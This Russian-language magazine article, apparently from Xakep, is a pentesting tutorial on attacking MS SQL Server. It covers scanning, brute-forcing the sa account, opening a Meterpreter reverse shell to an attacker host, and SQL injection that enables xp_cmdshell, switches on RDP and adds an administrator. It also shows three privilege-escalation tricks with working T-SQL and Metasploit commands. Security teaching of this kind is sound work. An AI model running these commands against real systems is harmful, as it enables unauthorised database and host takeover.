Практически ни один серьезный пентест не обходится без проверки СУБД, ведь это одна из самых популярных у злоумышленников дверей к желаемой информации и машине. В крупных проектах в качестве СУБД очень часто используется MS SQL Server. И о проверке именно его безопасности мы сегодня и поговорим. Открывать Америку не будем — опытные камрады лишь освежат свои знания, а вот для тех, кто только начинает осваивать тему, я постарался максимально подробно разложить все по пунктам.

 

WARNING!

Вся информация предоставлена исключительно в ознакомительных целях. Ни автор, ни редакция не несут ответственности за любой возможный вред, причиненный материалами данной статьи.

 

Введение

Один из самых важных критериев надежности информационной системы — безопасность СУБД. Атаки, направленные на нее, в большинстве случаев критические, потому что могут частично либо полностью нарушить работоспособность системы. Поскольку крупные организации формировали свою инфраструктуру давным-давно и обновление на новые версии ПО вызывает у них «большие» проблемы, самыми распространенными версиями до сих пор остаются MS SQL Server 2005 и MS SQL Server 2008. Но это всего лишь статистика, и далее мы будем рассматривать общие для всех версий векторы и техники. Для удобства условно разобьем весь процесс пентеста на несколько этапов.

 

Как найти MS SQL

Первое, что начинает делать пентестер, — это собирать информацию о сервисах, расположенных на сервере жертвы. Самое главное, что нужно знать для поиска Microsoft SQL Server, — номера портов, которые он слушает. А слушает он порты 1433 (TCP) и 1434 (UDP). Чтобы проверить, имеется ли MS SQL на сервере жертвы, необходимо его просканировать. Для этого можно использовать Nmap cо скриптом ms-sql-info. Запускаться сканирование будет примерно так:

nmap -p 1433 --script=ms-sql-info 192.168.18.128

Ну а результат его выполнения представлен на рис. 1.

Рис. 1.Сканирование MS SQL при помощи Nmap
Рис. 1.Сканирование MS SQL при помощи Nmap

Помимо Nmap, есть отличный сканирующий модуль для Метасплоита mssql_ping, позволяющий также определять наличие MS SQL на атакуемом сервере:

msf> use auxilary/scanner/mssql/mssql_ping
msf auxilary(mssql_ping) > set RHOSTS 192.167.1.87
RHOSTS => 192.168.1.87
msf auxilary(mssql_ping) > run

Используя один из данных вариантов, можно быстренько определить, установлен ли на сервере MS SQL, а также узнать его версию. После чего можно переходить к следующему этапу.

Рис. 2. Сканирование MS SQL при помощи mssql_ping
Рис. 2. Сканирование MS SQL при помощи mssql_ping
 

Brute force

Допустим, СУБД на сервере мы обнаружили. Теперь стоит задача получить к ней доступ. И тут нас встречает первое препятствие в виде аутентификации. Вообще, MS SQL поддерживает два вида аутентификации:

  1. Windows Authentication — доверительное соединение, при котором SQL Server принимает учетную запись пользователя, предполагая, что она уже проверена на уровне операционной системы.
  2. Смешанный режим — аутентификация средствами SQL Server + Windows Authentication.

По умолчанию используется первый режим аутентификации, а смешанный режим активируется отдельно. На практике же довольно трудно встретить базу без смешанного режима — он более гибок.

 

Некоторые плюсы смешанного режима

  • Позволяет SQL Server поддерживать более старые приложения, а также поставляемые сторонними производителями приложения, для которых необходима проверка подлинности SQL Server.
  • Позволяет SQL Server поддерживать среды с несколькими операционными системами, в которых пользователи не проходят проверку подлинности домена Windows.
  • Позволяет разработчикам программного обеспечения распространять свои приложения с помощью сложной иерархии разрешений, основанной на известных, заранее установленных именах входа SQL Server.

Обычно на данном этапе мы не имеем доступа в корпоративную сеть, тем самым использовать аутентификацию посредством Windows не можем. Но мы нашли открытый порт с MS SQL, значит, пробуем побрутить админскую учетку sa, стандартную для смешанного режима. Для автоматизации процесса используем модуль Метасплоита mssql_login:

msf > use auxiliary/scanner/mssql/mssql_login 
msf auxiliary(mssql_login) > set RHOSTS 172.16.2.104
RHOSTS => 172.16.2.104
msf auxiliary(mssql_login) > set PASS_FILE /root/Desktop/pass.txt
[*] 172.16.2.104:1433 - MSSQL - Starting authentication scanner.
[*] 172.16.2.104:1433 - LOGIN FAILED: WORKSTATION\sa:admin (Incorrect: )
[*] 172.16.2.104:1433 - LOGIN FAILED: WORKSTATION\sa:qwerty (Incorrect: )
[*] 172.16.2.104:1433 - LOGIN FAILED: WORKSTATION\sa:toor (Incorrect: )
[+] 172.16.2.104:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Отлично! Пароль найден, теперь можем переходить к следующему этапу. Но что, если учетки sa на сервере не окажется? Тогда придется брутить и логин, для чего необходимо будет указать скрипту еще один файл, откуда их брать:

msf auxiliary(mssql_login) > set USER_FILE /root/Desktop/user.txt

 

WWW

Большое разнообразие словарей для брутфорса можно найти здесь.

 

Получение shell’а

В случае если у нас получилось сбрутить учетку sa, мы можем залогиниться в БД. Далее сценарий прост — включаем хранимую процедуру, позволяющую выполнять команды на уровне операционной системы, и заливаем на сервер Meterpreter shell. Крутые ребята написали для Метасплоита отличный модуль mssql_payload, который автоматизирует этот процесс:

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set RHOST 172.16.2.104
msf exploit(mssql_payload) > set USERNAME sa
USERNAME => sa
msf exploit(mssql_payload) > set PASSWORD root
PASSWORD => root
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 172.16.2.105
LHOST => 172.16.2.105
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (172.16.2.105:4444 -> 172.16.2.104:3987) at 2015-02-20 10:42:52 -0500
meterpreter >

Сессия Meterpreter’a создана, теперь ты имеешь полный доступ. Можешь дампить хеш админа, делать скриншоты, создавать/удалять файлы, включать/выключать мышь или клавиатуру и многое другое. Пожалуй, это самый популярный шелл, который используется при тестах на проникновение. Полный список команд Meterpreter’a можно подсмотреть здесь.

 

Что делать, если логин/пароль не сбрутился?

Но не обольщайся, не так часто модуль mssql_login будет тебя радовать: пароль админы очень редко оставляют дефолтным. В таком случае получить шелл нам поможет SQL-инъекция. Представь себе HTML-форму, в которую пользователь вводит номер статьи, и простой уязвимый запрос к БД, причем все это работает под админской учеткой sa:

$strSQL = "SELECT * FROM [dbo].[articles] WHERE id=$id";

Переменная $id никак не фильтруется, значит, можно провести SQL-инъекцию, в которой любой запрос будет выполнен из-под админской учетки sa. Для того чтобы выполнять команды на уровне операционной системы, необходимо активировать хранимую процедуру xp_cmdshell, которая по умолчанию выключена. Нам потребуется отправить четыре запроса для ее активации:

  1. EXEC sp_configure 'show advanced options',1;
  2. reconfigure;
  3. ‘exec sp_configure 'xp_cmdshell',1;
  4. reconfigure

Системная хранимая процедура sp_configure позволяет просматривать, документировать, изменять и восстанавливать конфигурацию сервера. Наиболее простой способ получить доступ к серверу — включить RDP через реестр, создать пользователя с админскими правами и подключиться.

Включаем RDP:

10; reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Создаем пользователя:

10; exec master.dbo.xp_cmdshell 'net user root toor /ADD'

Даем права:

10;exec master.dbo.xp_cmdshell 'net localgroup administrators root/add'
 

Повышение привилегий. TRUSTWORTHY

В предыдущем случае запрос к базе происходил от имени админа, и поэтому было так просто исполнять команды операционной системы. Но что делать, если мы имеем урезанную учетку, у которой не будет прав включить xp_cmdshell? В этом случае нам помогут хранимые процедуры и активированное свойство TRUSTWORTHY у базы.

Но начнем с самого начала. Для большей наглядности этого вектора опишу весь этап еще на стадии конфигурации базы и учетных записей. Создаем новую базу YOLO: CREATE DATABASE YOLO;. Создаем нового пользователя bob с паролем marley: CREATE LOGIN bob WITH PASSWORD = 'marley'; Назначаем пользователя bob владельцем базы YOLO:

USE YOLO
ALTER LOGIN [bob] with default_database = [YOLO];
CREATE USER [bob] FROM LOGIN [bob];
EXEC sp_addrolemember [db_owner], [bob];

Затем устанавливаем свойство TRUSTWORTHY, которое определяет, разрешать ли объектам данной базы (представлениям, пользовательским функциям, хранимым процедурам) обращаться к объектам за пределами данной базы в режиме имперсонации: ALTER DATABASE YOLO SET TRUSTWORTHY ON. Логинимся в SQL Server под учеткой bob:marley.

Создаем хранимую процедуру для присвоения учетной записи bob привилегий sysadmin:

USE YOLO
GO
CREATE PROCEDURE sp_lvlup
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'bob','sysadmin'
GO

Убедимся, что до исполнения хранимой процедуры мы не имеем привилегий sysadmin:

SELECT is_srvrolemember('sysadmin')
результат = 0

Выполним созданную выше хранимую процедуру sp_lvlup:

USE YOLO
EXEC sp_lvlup

И опять проверим наши привилегии:

SELECT is_srvrolemember('sysadmin')
результат = 1

Процедура sp_lvlup создана для запуска от имени OWNER, что в данном случае является админской учетной записью sa. Это возможно, потому что db_owner создал хранимую процедуру для своей базы, а эта база сконфигурирована как надежная, то есть свойство TRUSTWORTHY = On. Без этого свойства не удалось бы исполнить процедуру из-за нехватки привилегий. Активированное свойство TRUSTWORTHY — это не всегда плохо. Проблемы начинаются, когда администраторы не понижают привилегии владельцам баз. В итоге учетной записи bob после исполнения процедуры sp_lvlup присвоены привилегии sysadmin. Чтобы посмотреть, у каких баз активировано свойство TRUSTWORTHY, можно воспользоваться следующим запросом:

SELECT name, database_id, is_trustworthy_on FROM sys.databases

Или для автоматизации всего процесса можно использовать модуль для Метасплоита mssql_escalate_dbowner_sqli:

use auxiliary/admin/mssql/mssql_escalate_dbowner_sqli
set rhost 172.16.2.104
set rport 80
set GET_PATH /login.asp?id=1+and+1=[SQLi];--
exploit
...
[+] 172.16.2.104:80 - Success! Bob is now a sysadmin!
 

Повышение привилегий. User Impersonation

Следующий вектор имеет название User Impersonation. Иногда хранимым процедурам необходим доступ к внешним ресурсам, находящимся за пределами базы приложения. Чтобы это реализовать, разработчики используют привилегии IMPERSONATE и функцию EXECUTE AS, позволяющие выполнить запрос от имени другой учетной записи. Это не уязвимость как таковая, а скорее слабая конфигурация, приводящая к эскалации привилегий.

Как и в предыдущем примере, начнем разбирать суть вектора еще на стадии конфигурации. Первым делом создаем четыре учетные записи:

CREATE LOGIN User1 WITH PASSWORD = 'secret';
CREATE LOGIN User2 WITH PASSWORD = 'secret';
CREATE LOGIN User3 WITH PASSWORD = 'secret';
CREATE LOGIN User4 WITH PASSWORD = 'secret';

Затем даем пользователю User1 привилегии исполнять запросы от имени sa, User2, User3:

USE master;
GRANT IMPERSONATE ON LOGIN::sa to [MyUser1];
GRANT IMPERSONATE ON LOGIN::MyUser2 to [MyUser1];
GRANT IMPERSONATE ON LOGIN::MyUser3 to [MyUser1];
GO

Логинимся в SQL Server под учетной записью User1 и проверяем, применились ли привилегии исполнять запросы от других учетных записей.

SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'

Теперь проверим текущие привилегии:

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
Результат = 0

Ну а сейчас собственно сам трюк — выполним запрос от имени sa, так как выше мы дали привилегии учетной записи User1 выполнять запросы от имени sa:

EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
Результат = 1

Все в порядке, теперь можем выполнять команды от имени sa, а значит, можно включить хранимую процедуру xp_cmdshell:

EXEC sp_configure 'show advanced options',1
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
GO

 

INFO

Учетная запись sysadmin по умолчанию может выполнять запросы от имени любых других пользователей. Вывести таблицу со всеми пользователями тебе поможет запрос: SELECT * FROM master.sys.sysusers WHERE islogin = 1. Для выполнения запроса от имени другой учетной записи используй EXECUTE AS LOGIN = 'AnyUser'. Чтобы вернуться снова к предыдущей учетной записи, достаточно выполнить запрос REVERT.

Вот и весь фокус. Для автоматизации, как обычно, можно воспользоваться модулем Метасплоита mssql_escalete_executeas_sqli:

use auxiliary/admin/mssql/mssql_escalate_execute_as_sqliex
set rhost 172.16.2.104
set rport 80
set GET_PATH /login.asp?id=1+and+1=[SQLi];--
exploit
...
[+] 172.16.2.104:80 - Success! User1 is now a sysadmin!
 

Повышение привилегий. Хранимые процедуры, подписанные сертификатом

Для описания данного вектора создадим уязвимую хранимую процедуру, подписанную сертификатом. В отличие от предыдущих примеров, для эскалации привилегий необязательны:

  • свойство TRUSTWORTHY = On;
  • привилегии IMPERSONATE и функция EXECUTE AS;
  • конфигурация хранимой процедуры с классом WITH EXECUTE AS для ее выполнения от имени другой учетной записи.

Создадим учетную запись с минимальными правами:

CREATE LOGIN tor WITH PASSWORD = 'loki';
GO
-- Set login’s default database
ALTER LOGIN [tor] with default_database = [master];
GO

Выключим свойство TRUSTWORTHY: ALTER DATABASE master SET TRUSTWORTHY OFF. И создадим простую хранимую процедуру sp_xxx, которая будет выводить столбец name из базы tempdb, а также из базы, которую ввел пользователь:

USE MASTER;
GO
CREATE PROCEDURE sp_xxx
@DbName varchar(max)
AS    
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases where name like ''%'+ @DbName+'%'' OR name=''tempdb''';
EXECUTE(@query)
END
GO

После этого создадим ключ шифрования для базы MASTER:

CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'secret';
GO

И сертификат:

CREATE CERTIFICATE sp_xxx_cert
WITH SUBJECT = 'To sign the sp_xxx',
EXPIRY_DATE = '2035-01-01';
GO

Следующим шагом создаем логин из сертификата sp_xxx:

CREATE LOGIN sp_xxx_login
FROM CERTIFICATE sp_xxx_cert

И подпишем процедуру созданным сертификатом:

ADD SIGNATURE to sp_xxx
BY CERTIFICATE sp_xxx_cert;
GO

Присвоим логину sp_lvlup2 привилегии sysadmin:

EXEC master..sp_addsrvrolemember @loginame = N'sp_xxx_login', @rolename = N'sysadmin'
GO

Даем привилегии членам группы PUBLIC исполнять процедуру:

GRANT EXECUTE ON sp_xxx to PUBLIC

В итоге мы создали пользователя tor с минимальными правами, хранимую процедуру sp_xxx, которая выводит имя введенной базы, создали сертификат sp_xxx_cert и подписали им хранимую процедуру, а также создали логин sp_xxx_login из сертификата и дали ему привилегии sysadmin. На этом подготовительная часть закончена. Логинимся учетной записью tor и вызываем хранимую процедуру:

EXEC MASTER.dbo.sp_xxx 'master'

Как и положено, она вернет нам имя указанной нами БД — master и tempdb (см. рис. 3).

Рис. 3. Результат выполнения запроса EXEC MASTER.dbo.sp_xxx 'master'
Рис. 3. Результат выполнения запроса EXEC MASTER.dbo.sp_xxx ‘master’

Запрос вида EXEC MASTER.dbo.sp_sqli2 'master''--' вернет уже только master (см. рис. 4).

Рис .4. Результат выполнения запроса EXEC MASTER.dbo.xxx 'master''--'
Рис .4. Результат выполнения запроса EXEC MASTER.dbo.xxx ‘master»—‘

Отлично. Это означает, что хранимая процедура подвержена SQL-инъекции. Проверим наши привилегии с помощью следующего запроса:

EXEC MASTER.dbo.sp_xxx 'master'';SELECT is_srvrolemember(''sysadmin'')as priv_certsp--';

Рис. 5. Проверяем наши привилегии через уязвимую хранимую процедуру
Рис. 5. Проверяем наши привилегии через уязвимую хранимую процедуру

priv_cersp=1(см. рис. 5) означает, что мы имеем привилегии sysadmin. Выполнить команду EXEC master..xp_cmdshell 'whoami'; не получится, потому что у учетной записи tor минимальные права, но если этот запрос внедрить в SQL-инъекцию, то все сработает (рис. 6).

Рис.6. Проверяем свои привилегии в системе
Рис.6. Проверяем свои привилегии в системе

Что самое интересное, такой трюк будет работать в версиях 2005–2014.

 

Заключение

Разница во всех этих векторах весьма существенна. В некоторых случаях для достижения цели можно ограничиться включенным свойством TRUSTWORTHY, позволяющим использовать ресурсы данной базы объектам, находящимся вне, для того чтобы создать и исполнить хранимую процедуру, повышающую привилегии. Где-то можно выполнять хранимые процедуры от имени других учетных записей благодаря наличию привилегий IMPERSONATE и функции EXECUTE AS, а в третьих случаях важно лишь наличие SQL-инъекции, через которую можно внедрить запрос, и он будет исполнен от имени другой учетной записи. Для полного понимания нюансов и тонкостей я бы советовал проверить эти векторы на своей локальной машине.

В статье не дано исчерпывающее изложение всех векторов атак на СУБД MS SQL, но для поверхностного анализа защищенности она будет весьма полезна. Также рекомендую ознакомиться с другим вектором взлома через DB link’и, который описал Алексей Тюрин в декабрьском номере ][ (#191) в разделе Easy Hack. На этом все, благодарю за внимание и до новых встреч.

3 комментария

  1. 08.04.2015 at 18:13

    хрень полная для детсада. Ещё и бабки за это платить???
    Совсем офигели.

  2. 08.04.2015 at 19:30

    SQL инъекции пока рулят.

  3. 08.04.2015 at 21:23

    А когда у хакера будет mysql?

Оставить мнение

Check Also

Что можно сделать с iPhone, зная пасскод. Как сливают данные, уводят iCloud и блокируют остальные устройства

Последние несколько месяцев мы много писали о нововведениях в iOS 11. «Теперь-то заживем!»…